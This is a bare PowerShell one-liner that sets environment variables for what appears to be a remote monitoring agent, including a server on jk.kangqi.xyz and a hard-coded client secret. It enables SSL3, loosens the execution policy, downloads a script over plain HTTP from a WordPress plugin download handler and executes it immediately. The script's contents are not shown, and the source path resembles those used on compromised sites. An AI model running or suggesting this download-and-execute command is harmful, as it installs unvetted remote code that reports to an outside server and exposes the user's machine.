$env:NZ_SERVER="jk.kangqi.xyz:8008";$env:NZ_TLS="false";$env:NZ_CLIENT_SECRET="yEJfpTeSU8XQHI75cEM49lrRl8e8vgEc"; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Ssl3 -bor [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12;set-ExecutionPolicy RemoteSigned;Invoke-WebRequest http://www.kangqi.xyz/wp-content/plugins/admin-file-manager/includes/download-handler.php?id=6 -OutFile C:install.ps1;powershell.exe C:install.ps1